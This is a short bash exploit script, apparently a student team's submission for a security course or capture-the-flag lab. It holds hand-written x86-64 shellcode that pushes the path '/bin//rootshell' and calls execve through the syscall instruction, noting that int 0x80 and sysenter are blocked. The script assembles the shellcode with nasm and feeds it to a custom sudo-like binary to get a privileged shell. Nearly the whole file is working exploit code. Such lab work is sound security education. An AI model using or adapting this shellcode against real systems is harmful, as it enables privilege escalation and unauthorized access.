42 lines
803 B
Bash
Executable file
42 lines
803 B
Bash
Executable file
#!/bin/bash
|
|
# Exploit handcrafted by Team Shell Smash.
|
|
# zhan4854, beach144, jerus005
|
|
|
|
# Shellcode
|
|
cat > shellcode.s << EOF
|
|
bits 64
|
|
# Pad with four zeros
|
|
db 0x00, 0x00, 0x00, 0x00
|
|
|
|
push rbp
|
|
# Pushing 0x00000000, which is the second argument of argv[]
|
|
xor rax, rax
|
|
push rax
|
|
|
|
# The string "/bin//rootshell", literally
|
|
mov rdi, 0x006c6c656873746f
|
|
push rdi
|
|
mov rdi, 0x6f722f2f6e69622f
|
|
push rdi
|
|
|
|
# 1st argument (filename)
|
|
mov rdi, rsp
|
|
# 3rd argument (envp), should be 0x00000000
|
|
push rax
|
|
mov rdx, rsp
|
|
# 2nd argument (argv), is a pointer to 1st argument
|
|
push rbx
|
|
mov rsi, rsp
|
|
|
|
# 0x3b, or 59 is the syscall number for execve
|
|
mov al, 0x3b
|
|
# Blocking int 0x80 and sysenter but not syscall? lol
|
|
syscall
|
|
ret
|
|
EOF
|
|
|
|
# Compile to bin
|
|
nasm -f bin -o shellcode shellcode.s
|
|
|
|
# Execute
|
|
echo "llllR" | sudobcvi64 shellcode
|